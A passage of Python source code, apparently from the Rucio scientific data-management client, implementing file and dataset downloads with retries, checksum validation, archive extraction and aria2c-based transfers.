trace['dataset'] = archive_name
trace['filename'] = file_extract
# preparing output directories
dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'),
os.path.join(archive_scope, archive_name + '.extracted'), file_extract,
item.get('no_subdir'))
logger.debug('%sPreparing output destination %s' % (log_prefix, dest_dir_path))
# validation and customisation of list of replicas
archive_replicas = list(archive_replicas)
if len(archive_replicas) != 1:
raise RucioException('No replicas for DID found or dataset was given.')
archive_pfns = archive_replicas[0]['pfns'].keys()
if len(archive_pfns) == 0:
raise InputValidationError('No PFNs for replicas of archive %s' % archive)
# checking whether file already exists
success = False
dest_file_path = os.path.join(dest_dir_path, file_extract)
if os.path.isfile(dest_file_path):
logger.info('%s%s File exists already locally: %s' % (log_prefix, file_extract_name, dest_dir_path))
trace['clientState'] = 'ALREADY_DONE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
self._send_trace(trace)
success = True
# DOWNLOAD, iteration over different rses unitl success
retry_counter = 0
while not success and len(archive_pfns):
retry_counter += 1
pfn = archive_pfns.pop()
trace['rse'] = archive_replicas[0]['pfns'][pfn]['rse']
try:
start_time = time.time()
cmd = 'xrdcp -vf %s -z %s %s' % (pfn, file_extract_name, dest_dir_path)
logger.debug('%sExecuting: %s' % (log_prefix, cmd))
status, out, err = execute(cmd)
end_time = time.time()
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
if status == 54:
trace['clientState'] = 'FAILED'
raise SourceNotFound(err)
elif status != 0:
trace['clientState'] = 'FAILED'
raise RucioException(err)
else:
success = True
item['clientState'] = 'DONE'
trace['clientState'] = 'DONE'
except Exception as e:
trace['clientState'] = 'FAILED'
trace['stateReason'] = str(ServiceUnavailable(e))
raise ServiceUnavailable(e)
self._send_trace(trace)
if not success:
raise RucioException('Failed to download file %s after %d retries' % (file_extract_name, retry_counter))
return self._check_output(items)
def download_pfns(self, items, num_threads=2, trace_custom_fields={}):
"""
Download items with a given PFN. This function can only download files, no datasets.
:param items: List of dictionaries. Each dictionary describing a file to download. Keys:
pfn - PFN string of this file
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are not allowed
base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
ignore_checksum - Optional: If true, the checksum validation is skipped (for pfn downloads the checksum must be given explicitly). (Default: True)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger.info('Processing %d item(s) for input' % len(items))
input_items = []
for item in items:
did_str = item.get('did')
pfn = item.get('pfn')
rse = item.get('rse')
if not did_str or not pfn or not rse:
logger.debug(item)
raise InputValidationError('The keys did, pfn, and rse are mandatory')
logger.debug('Preparing PFN download of %s (%s) from %s' % (did_str, pfn, rse))
if '*' in did_str:
logger.debug(did_str)
raise InputValidationError('Cannot use PFN download with wildcard in DID')
did_scope, did_name = self._split_did_str(did_str)
dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'),
did_scope, did_name,
item.get('no_subdir'))
item['scope'] = did_scope
item['name'] = did_name
item['sources'] = [{'pfn': pfn, 'rse': rse}]
dest_file_path = os.path.join(dest_dir_path, did_name)
item['dest_file_paths'] = [dest_file_path]
item['temp_file_path'] = '%s.part' % dest_file_path
options = item.setdefault('merged_options', {})
options.setdefault('ignore_checksum', item.pop('ignore_checksum', True))
options.setdefault('transfer_timeout', item.pop('transfer_timeout', None))
input_items.append(item)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
def download_dids(self, items, num_threads=2, trace_custom_fields={}):
"""
Download items with given DIDs. This function can also download datasets and wildcarded DIDs.
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name')
filters - Filter to select DIDs for download. Optional if DID is given
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
no_resolve_archives - Optional: bool indicating whether archives should not be considered for download (Default: False)
resolve_archives - Deprecated: Use no_resolve_archives instead
force_scheme - Optional: force a specific scheme to download this item. (Default: None)
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger.info('Processing %d item(s) for input' % len(items))
download_info = self._resolve_and_merge_input_items(copy.deepcopy(items))
did_to_options = download_info['did_to_options']
merged_items = download_info['merged_items']
self.logger.debug('num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items)))
logger.info('Getting sources of DIDs')
# if one item wants to resolve archives we enable it for all items
resolve_archives = not all(item.get('no_resolve_archives') for item in merged_items)
merged_items_with_sources = self._get_sources(merged_items, resolve_archives=resolve_archives)
input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=resolve_archives)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
def download_from_metalink_file(self, item, metalink_file_path, num_threads=2, trace_custom_fields={}):
"""
Download items using a given metalink file.
:param item: dictionary describing an item to download. Keys:
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
logger.info('Getting sources from metalink file')
metalinks = parse_replicas_from_file(metalink_file_path)
trace_custom_fields['uuid'] = generate_uuid()
did_to_options = {}
item.setdefault('destinations', set()).add((item['base_dir'], item['no_subdir']))
for metalink in metalinks:
did_to_options[metalink['did']] = item
metalinks = [metalinks]
input_items = self._prepare_items_for_download(did_to_options, metalinks)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
def _download_multithreaded(self, input_items, num_threads, trace_custom_fields={}):
"""
Starts an appropriate number of threads to download items from the input list.
(This function is meant to be used as class internal only)
:param input_items: list containing the input items to download
:param num_threads: suggestion of how many threads should be started
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: list with output items as dictionaries
"""
logger = self.logger
num_files = len(input_items)
nlimit = 5
num_threads = max(1, num_threads)
num_threads = min(num_files, num_threads, nlimit)
input_queue = Queue()
output_queue = Queue()
input_queue.queue = deque(input_items)
if num_threads < 2:
logger.info('Using main thread to download %d file(s)' % num_files)
self._download_worker(input_queue, output_queue, trace_custom_fields, '')
return list(output_queue.queue)
logger.info('Using %d threads to download %d files' % (num_threads, num_files))
threads = []
for thread_num in range(1, num_threads + 1):
log_prefix = 'Thread %s/%s: ' % (thread_num, num_threads)
kwargs = {'input_queue': input_queue,
'output_queue': output_queue,
'trace_custom_fields': trace_custom_fields,
'log_prefix': log_prefix}
try:
thread = Thread(target=self._download_worker, kwargs=kwargs)
thread.start()
threads.append(thread)
except Exception as error:
logger.warning('Failed to start thread %d' % thread_num)
logger.debug(error)
try:
logger.debug('Waiting for threads to finish')
for thread in threads:
thread.join()
except KeyboardInterrupt:
logger.warning('You pressed Ctrl+C! Exiting gracefully')
for thread in threads:
thread.kill_received = True
return list(output_queue.queue)
def _download_worker(self, input_queue, output_queue, trace_custom_fields, log_prefix):
"""
This function runs as long as there are items in the input queue,
downloads them and stores the output in the output queue.
(This function is meant to be used as class internal only)
:param input_queue: queue containing the input items to download
:param output_queue: queue where the output items will be stored
:param trace_custom_fields: Custom key value pairs to send with the traces
:param log_prefix: string that will be put at the beginning of every log message
"""
logger = self.logger
logger.debug('%sStart processing queued downloads' % log_prefix)
while True:
try:
item = input_queue.get_nowait()
except Empty:
break
try:
trace = copy.deepcopy(self.trace_tpl)
trace.update(trace_custom_fields)
download_result = self._download_item(item, trace, log_prefix)
output_queue.put(download_result)
except KeyboardInterrupt:
logger.warning('You pressed Ctrl+C! Exiting gracefully')
os.kill(os.getpgid(), signal.SIGINT)
break
except Exception as error:
logger.error('%sFailed to download item' % log_prefix)
logger.debug(error)
def _download_item(self, item, trace, log_prefix=''):
"""
Downloads the given item and sends traces for success/failure.
(This function is meant to be used as class internal only)
:param item: dictionary that describes the item to download
:param trace: dictionary representing a pattern of trace that will be send
:param log_prefix: string that will be put at the beginning of every log message
:returns: dictionary with all attributes from the input item and a clientState attribute
"""
logger = self.logger
did_scope = item['scope']
did_name = item['name']
did_str = '%s:%s' % (did_scope, did_name)
logger.info('%sPreparing download of %s' % (log_prefix, did_str))
trace['scope'] = did_scope
trace['filename'] = did_name
trace.setdefault('datasetScope', item.get('dataset_scope', ''))
trace.setdefault('dataset', item.get('dataset_name', ''))
trace.setdefault('filesize', item.get('bytes'))
dest_file_paths = item['dest_file_paths']
# if file already exists make sure it exists at all destination paths, set state, send trace, and return
for dest_file_path in dest_file_paths:
if os.path.isfile(dest_file_path):
logger.info('%sFile exists already locally: %s' % (log_prefix, did_str))
for missing_file_path in dest_file_paths:
if not os.path.isfile(missing_file_path):
logger.debug("copying '%s' to '%s'" % (dest_file_path, missing_file_path))
shutil.copy2(dest_file_path, missing_file_path)
item['clientState'] = 'ALREADY_DONE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'ALREADY_DONE'
send_trace(trace, self.client.host, self.client.user_agent)
return item
# check if file has replicas
sources = item.get('sources')
if not sources or not len(sources):
logger.warning('%sNo available source found for file: %s' % (log_prefix, did_str))
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
self._send_trace(trace)
return item
# try different PFNs until one succeeded
temp_file_path = item['temp_file_path']
success = False
i = 0
while not success and i < len(sources):
source = sources[i]
i += 1
pfn = source['pfn']
rse_name = source['rse']
scheme = pfn.split(':')[0]
try:
rse = rsemgr.get_rse_info(rse_name)
except RSENotFound:
logger.warning('%sCould not get info of RSE %s' % (log_prefix, rse_name))
continue
trace['remoteSite'] = rse_name
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
trace['protocol'] = scheme
logger.info('%sTrying to download with %s from %s: %s ' % (log_prefix, scheme, rse_name, did_str))
try:
protocol = rsemgr.create_protocol(rse, operation='read', scheme=scheme)
protocol.connect()
except Exception as error:
logger.warning('%sFailed to create protocol for PFN: %s' % (log_prefix, pfn))
logger.debug('scheme: %s, exception: %s' % (scheme, error))
continue
attempt = 0
retries = 2
# do some retries with the same PFN if the download fails
while not success and attempt < retries:
attempt += 1
item['attemptnr'] = attempt
if os.path.isfile(temp_file_path):
logger.debug('%sDeleting existing temporary file: %s' % (log_prefix, temp_file_path))
os.unlink(temp_file_path)
start_time = time.time()
try:
protocol.get(pfn, temp_file_path, transfer_timeout=item.get('merged_options', {}).get('transfer_timeout'))
success = True
except Exception as error:
logger.debug(error)
trace['clientState'] = str(type(error).__name__)
end_time = time.time()
if success and not item.get('merged_options', {}).get('ignore_checksum', False):
rucio_checksum = item.get('adler32')
local_checksum = None
if rucio_checksum is None:
rucio_checksum = item.get('md5')
if rucio_checksum is None:
logger.warning('%sNo remote checksum available. Skipping validation.' % log_prefix)
else:
local_checksum = md5(temp_file_path)
else:
local_checksum = adler32(temp_file_path)
if rucio_checksum != local_checksum:
success = False
os.unlink(temp_file_path)
logger.warning('%sChecksum validation failed for file: %s' % (log_prefix, did_str))
logger.debug('Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
trace['clientState'] = 'FAIL_VALIDATE'
if not success:
logger.warning('%sDownload attempt failed. Try %s/%s' % (log_prefix, attempt, retries))
self._send_trace(trace)
protocol.close()
if not success:
logger.error('%sFailed to download file %s' % (log_prefix, did_str))
item['clientState'] = 'FAILED'
return item
dest_file_path_iter = iter(dest_file_paths)
first_dest_file_path = next(dest_file_path_iter)
logger.debug("renaming '%s' to '%s'" % (temp_file_path, first_dest_file_path))
os.rename(temp_file_path, first_dest_file_path)
for cur_dest_file_path in dest_file_path_iter:
logger.debug("copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
trace['clientState'] = 'DONE'
item['clientState'] = 'DONE'
self._send_trace(trace)
duration = round(end_time - start_time, 2)
size = item.get('bytes')
size_str = sizefmt(size, self.is_human_readable)
if size and duration:
rate = round((size / duration) * 1e-6, 2)
logger.info('%sFile %s successfully downloaded. %s in %s seconds = %s MBps' % (log_prefix, did_str, size_str, duration, rate))
else:
logger.info('%sFile %s successfully downloaded in %s seconds' % (log_prefix, did_str, duration))
file_items_in_archive = item.get('archive_items', [])
if len(file_items_in_archive) > 0:
logger.info('%sExtracting %d file(s) from %s' % (log_prefix, len(file_items_in_archive), did_name))
archive_file_path = first_dest_file_path
for file_item in file_items_in_archive:
extraction_ok = False
extract_file_name = file_item['name']
dest_file_path_iter = iter(file_item['dest_file_paths'])
first_dest_file_path = next(dest_file_path_iter)
dest_dir = os.path.dirname(first_dest_file_path)
logger.debug('%sExtracting %s to %s' % (log_prefix, extract_file_name, dest_dir))
for extraction_tool in self.extraction_tools:
if extraction_tool.try_extraction(archive_file_path, extract_file_name, dest_dir):
extraction_ok = True
break
if not extraction_ok:
logger.error('Extraction of file %s from archive %s failed.' % (extract_file_name, did_name))
continue
first_dest_file_path = os.path.join(dest_dir, extract_file_name)
for cur_dest_file_path in dest_file_path_iter:
logger.debug("copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
if not item.get('shall_keep_archive'):
logger.debug('%sDeleting archive %s' % (log_prefix, did_name))
os.remove(archive_file_path)
return item
def download_aria2c(self, items, trace_custom_fields={}, filters={}):
"""
Uses aria2c to download the items with given DIDs. This function can also download datasets and wildcarded DIDs.
It only can download files that are available via https/davs.
Aria2c needs to be installed and X509_USER_PROXY needs to be set!
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
:param trace_custom_fields: Custom key value pairs to send with the traces
:param filters: dictionary containing filter options
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something went wrong during the download (e.g. aria2c could not be started)
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
rpc_secret = '%x' % (random.getrandbits(64))
rpc_auth = 'token:%s' % rpc_secret
rpcproc, aria_rpc = self._start_aria2c_rpc(rpc_secret)
for item in items:
item['force_scheme'] = ['https', 'davs']
logger.info('Processing %d item(s) for input' % len(items))
download_info = self._resolve_and_merge_input_items(copy.deepcopy(items))
did_to_options = download_info['did_to_options']
merged_items = download_info['merged_items']
self.logger.debug('num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items)))
logger.info('Getting sources of DIDs')
merged_items_with_sources = self._get_sources(merged_items)
input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=False)
try:
output_items = self._download_items_aria2c(input_items, aria_rpc, rpc_auth, trace_custom_fields)
except Exception as error:
self.logger.error('Unknown exception during aria2c download')
self.logger.debug(error)
finally:
try:
aria_rpc.aria2.forceShutdown(rpc_auth)
finally:
rpcproc.terminate()
return self._check_output(output_items)
def _start_aria2c_rpc(self, rpc_secret):
"""
Starts aria2c in RPC mode as a subprocess. Also creates
the RPC proxy instance.
(This function is meant to be used as class internal only)
:param rpc_secret: the secret for the RPC proxy
:returns: a tupel with the process and the rpc proxy objects
:raises RucioException: if the process or the proxy could not be created
"""
logger = self.logger
try:
from xmlrpclib import ServerProxy as RPCServerProxy # py2
except ImportError:
from xmlrpc.client import ServerProxy as RPCServerProxy
cmd = 'aria2c '\
'--enable-rpc '\
'--certificate=$X509_USER_PROXY '\
'--private-key=$X509_USER_PROXY '\
'--ca-certificate=/etc/pki/tls/certs/CERN-bundle.pem '\
'--quiet=true '\
'--allow-overwrite=true '\
'--auto-file-renaming=false '\
'--stop-with-process=%d '\
'--rpc-secret=%s '\
'--rpc-listen-all=false '\
'--rpc-max-request-size=100M '\
'--connect-timeout=5 '\
'--rpc-listen-port=%d'
logger.info('Starting aria2c rpc server...')
# trying up to 3 random ports
for attempt in range(3):
port = random.randint(1024, 65534)
logger.debug('Trying to start rpc server on port: %d' % port)
try:
to_exec = cmd % (os.getpid(), rpc_secret, port)
logger.debug(to_exec)
rpcproc = execute(to_exec, False)
except Exception as error:
raise RucioException('Failed to execute aria2c!', error)
# if port is in use aria should fail to start so give it some time
time.sleep(2)
# did it fail?
if rpcproc.poll() is not None:
(out, err) = rpcproc.communicate()
logger.debug('Failed to start aria2c with port: %d' % port)
logger.debug('aria2c output: %s' % out)
else:
break
if rpcproc.poll() is not None:
raise RucioException('Failed to start aria2c rpc server!')
try:
aria_rpc = RPCServerProxy('http://localhost:%d/rpc' % port)
except Exception as error:
rpcproc.kill()
raise RucioException('Failed to initialise rpc proxy!', error)
return (rpcproc, aria_rpc)
def _download_items_aria2c(self, items, aria_rpc, rpc_auth, trace_custom_fields={}):
"""
Uses aria2c to download the given items. Aria2c needs to be started
as RPC background process first and a RPC proxy is needed.
(This function is meant to be used as class internal only)
:param items: list of dictionaries containing one dict for each file to download
:param aria_rcp: RPCProxy to the aria2c process
:param rpc_auth: the rpc authentication token
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
"""
logger = self.logger
gid_to_item = {} # maps an aria2c download id (gid) to the download item
pfn_to_rse = {}
items_to_queue = [item for item in items]
# items get removed from gid_to_item when they are complete or failed
while len(gid_to_item) or len(items_to_queue):
num_queued = 0
# queue up to 100 files and then check arias status
while (num_queued < 100) and len(items_to_queue):
item = items_to_queue.pop()
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
trace = {'scope': file_scope,
'filename': file_name,
'datasetScope': item.get('dataset_scope', ''),
'dataset': item.get('dataset_name', ''),
'protocol': 'https',
'remoteSite': '',
'filesize': item.get('bytes', None),
'transferStart': time.time(),
'transferEnd': time.time()}
trace.update(self.trace_tpl)
trace.update(trace_custom_fields)
# get pfns from all replicas
pfns = []
for src in item['sources']:
pfn = src['pfn']
if pfn[0:4].lower() == 'davs':
pfn = pfn.replace('davs', 'https', 1)
pfns.append(pfn)
pfn_to_rse[pfn] = src['rse']
# does file exist and are sources available?
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
if os.path.isfile(dest_file_path):
logger.info('File exists already locally: %s' % file_did_str)
item['clientState'] = 'ALREADY_DONE'
trace['clientState'] = 'ALREADY_DONE'
self._send_trace(trace)
elif len(pfns) == 0:
logger.warning('No available source found for file: %s' % file_did_str)
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
self._send_trace(trace)
else:
item['trace'] = trace
options = {'dir': os.path.dirname(dest_file_path),
'out': os.path.basename(item['temp_file_path'])}
gid = aria_rpc.aria2.addUri(rpc_auth, pfns, options)
gid_to_item[gid] = item
num_queued += 1
logger.debug('Queued file: %s' % file_did_str)
# get some statistics
aria_stat = aria_rpc.aria2.getGlobalStat(rpc_auth)
num_active = int(aria_stat['numActive'])
num_waiting = int(aria_stat['numWaiting'])
num_stopped = int(aria_stat['numStoppedTotal'])
# save start time if one of the active downloads has started
active = aria_rpc.aria2.tellActive(rpc_auth, ['gid', 'completedLength'])
for dlinfo in active:
gid = dlinfo['gid']
if int(dlinfo['completedLength']) > 0:
gid_to_item[gid].setdefault('transferStart', time.time())
stopped = aria_rpc.aria2.tellStopped(rpc_auth, -1, num_stopped, ['gid', 'status', 'files'])
for dlinfo in stopped:
gid = dlinfo['gid']
item = gid_to_item[gid]
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
temp_file_path = item['temp_file_path']
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
# ensure we didnt miss the active state (e.g. a very fast download)
start_time = item.setdefault('transferStart', time.time())
end_time = item.setdefault('transferEnd', time.time())
# get used pfn for traces
trace = item['trace']
for uri in dlinfo['files'][0]['uris']:
if uri['status'].lower() == 'used':
trace['remoteSite'] = pfn_to_rse.get(uri['uri'], '')
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
# ensure file exists
status = dlinfo.get('status', '').lower()
if status == 'complete' and os.path.isfile(temp_file_path):
# checksum check
skip_check = item.get('ignore_checksum', False)
rucio_checksum = 0 if skip_check else item.get('adler32')
local_checksum = 0 if skip_check else adler32(temp_file_path)
if rucio_checksum == local_checksum:
item['clientState'] = 'DONE'
trace['clientState'] = 'DONE'
# remove .part ending
os.rename(temp_file_path, dest_file_path)
# calculate duration
duration = round(end_time - start_time, 2)
duration = max(duration, 0.01) # protect against 0 division
size = item.get('bytes', 0)
rate = round((size / duration) * 1e-6, 2)
size_str = sizefmt(size, self.is_human_readable)
logger.info('File %s successfully downloaded. %s in %s seconds = %s MBps' % (file_did_str,
size_str,
duration,
rate))
else:
os.unlink(temp_file_path)
logger.warning('Checksum validation failed for file: %s' % file_did_str)
logger.debug('Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
item['clientState'] = 'FAIL_VALIDATE'
trace['clientState'] = 'FAIL_VALIDATE'
else:
logger.error('Failed to download file: %s' % file_did_str)
logger.debug('Aria2c status: %s' % status)
item['clientState'] = 'FAILED'
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
self._send_trace(trace)
del item['trace']
aria_rpc.aria2.removeDownloadResult(rpc_auth, gid)
del gid_to_item[gid]
if len(stopped) > 0:
logger.info('Active: %d, Waiting: %d, Stopped: %d' % (num_active, num_waiting, num_stopped))
return items
def _resolve_and_merge_input_items(self, items):
"""
This function takes the input items given to download_dids etc. and merges them
respecting their individual options. This way functions can operate on these items
in batch mode. E.g., list_replicas calls are reduced.
:param items: List of dictionaries. Each dictionary describing an input item
:returns: a dictionary with a dictionary that maps the input DIDs to options
and a list with a dictionary for each merged download item
:raises InputValidationError: if one of the input items is in the wrong format
"""
logger = self.logger
# check mandatory options before doing any server calls
for item in items:
if item.get('resolve_archives') is not None:
logger.warning('resolve_archives option is deprecated and will be removed in a future release.')
item.setdefault('no_resolve_archives', not item.pop('resolve_archives'))
did = item.get('did', [])
if len(did) == 0:
if not item.get('filters', {}).get('scope'):
logger.debug(item)
raise InputValidationError('Item without did and filter/scope')
item['did'] = [None]
elif not isinstance(did, list):
item['did'] = [did]
distinct_keys = ['rse', 'force_scheme', 'nrandom']
all_resolved_did_strs = set()
did_to_options = {}
merged_items = []
download_info = {'did_to_options': did_to_options,
'merged_items': merged_items}
while len(items) > 0:
item = items.pop()
filters = item.get('filters', {})
item_dids = item.pop('did')
if item_dids[0] is None:
logger.debug('Resolving DIDs by using filter options')
item_dids = []
scope = filters.pop('scope')
for did_name in self.client.list_dids(scope, filters=filters, type='all'):
item_dids.append('%s:%s' % (scope, did_name))
base_dir = item.pop('base_dir', '.')
no_subdir = item.pop('no_subdir', False)
ignore_checksum = item.pop('ignore_checksum', False)
new_transfer_timeout = item.pop('transfer_timeout', None)
resolved_dids = item.setdefault('dids', [])
for did_str in item_dids:
did_scope, did_name = self._split_did_str(did_str)
tmp_did_names = []
if '*' in did_name:
filters['name'] = did_name
tmp_did_names = list(self.client.list_dids(did_scope, filters=filters, type='all'))
else:
tmp_did_names = [did_name]
for did_name in tmp_did_names:
resolved_did_str = '%s:%s' % (did_scope, did_name)
options = did_to_options.setdefault(resolved_did_str, {})
options.setdefault('destinations', set()).add((base_dir, no_subdir))
if resolved_did_str in all_resolved_did_strs:
# in this case the DID was already given in another item
# the options of this DID will be ignored and the options of the first item that contained the DID will be used
# another approach would be to compare the options and apply the more relaxed options
logger.debug('Ignoring further options of DID: %s' % resolved_did_str)
continue
options['ignore_checksum'] = (options.get('ignore_checksum') or ignore_checksum)
cur_transfer_timeout = options.setdefault('transfer_timeout', None)
if cur_transfer_timeout is not None and new_transfer_timeout is not None:
options['transfer_timeout'] = max(int(cur_transfer_timeout), int(new_transfer_timeout))
elif new_transfer_timeout is not None:
options['transfer_timeout'] = int(new_transfer_timeout)
resolved_dids.append({'scope': did_scope, 'name': did_name})
all_resolved_did_strs.add(resolved_did_str)
if len(resolved_dids) == 0:
logger.warning('An item didnt have any DIDs after resolving the input. Ignoring it.')
logger.debug(item)
continue
was_merged = False
for merged_item in merged_items:
if all(item.get(k) == merged_item.get(k) for k in distinct_keys):
merged_item['dids'].extend(resolved_dids)
was_merged = True
break
if not was_merged:
item['dids'] = resolved_dids
merged_items.append(item)
return download_info
def _get_sources(self, merged_items, resolve_archives=True):
"""
Get sources (PFNs) of the DIDs.
:param merged_items: list of dictionaries. Each dictionary describes a bunch of DIDs to download
:returns: list of list of dictionaries.
"""
logger = self.logger
merged_items_with_sources = []
for item in merged_items:
# since we're using metalink we need to explicitly give all schemes
schemes = item.get('force_scheme')
if schemes:
schemes = schemes if isinstance(schemes, list) else [schemes]
logger.debug('schemes: %s' % schemes)
# extend RSE expression to exclude tape RSEs for non-admin accounts
rse_expression = item.get('rse')
if self.is_tape_excluded:
rse_expression = '*\istape=true' if not rse_expression else '(%s)\istape=true' % rse_expression
logger.debug('rse_expression: %s' % rse_expression)
# get PFNs of files and datasets
logger.debug('num DIDs for list_replicas call: %d' % len(item['dids']))
metalink_str = self.client.list_replicas(item['dids'],
schemes=schemes,
rse_expression=rse_expression,
client_location=self.client_location,
resolve_archives=resolve_archives,
resolve_parents=True,
metalink=True)
file_items = parse_replicas_from_string(metalink_str)
logger.debug('num resolved files: %s' % len(file_items))
nrandom = item.get('nrandom')
if nrandom:
logger.info('Selecting %d random replicas from DID(s): %s' % (nrandom, item['dids']))
random.shuffle(file_items)
file_items = file_items[0:nrandom]
merged_items_with_sources.append(file_items)
else:
merged_items_with_sources.append(file_items)
return merged_items_with_sources
def _prepare_items_for_download(self, did_to_options, merged_items_with_sources, resolve_archives=True):
"""
Optimises the amount of files to download
(This function is meant to be used as class internal only)
:param did_to_options: dictionary that maps each input DID to some input options
:param merged_items_with_sources: list of dictionaries. Each dictionary describes a bunch of DIDs to download
:returns: list of dictionaries. Each dictionary describes an element to download
:raises InputValidationError: if the given input is not valid or incomplete
"""
logger = self.logger
if resolve_archives:
# perhaps we'll need an extraction tool so check what is installed
self.extraction_tools = [tool for tool in self.extraction_tools if tool.is_useable()]
if len(self.extraction_tools) < 1:
logger.warning('Archive resolution is enabled but no extraction tool is available. '
'Sources whose protocol doesnt support extraction wont be considered for download.')
# maps file item IDs (fiid) to the file item object
fiid_to_file_item = {}
# list of all file item objects
all_file_items = []
# cea -> client_extract archives to avoid confusion with archives that dont need explicit extraction
# this dict will contain all ids of cea's that definitely will be downloaded
cea_id_pure_to_fiids = {}
# this dict will contain ids of cea's that have higher prioritised non cea sources
cea_id_mixed_to_fiids = {}
all_input_dids = set(did_to_options.keys())
all_dest_file_paths = set()
# get replicas for every file of the given dids
logger.debug('num list_replicas calls: %d' % len(merged_items_with_sources))
for file_items in merged_items_with_sources:
all_file_items.extend(file_items)
for file_item in file_items:
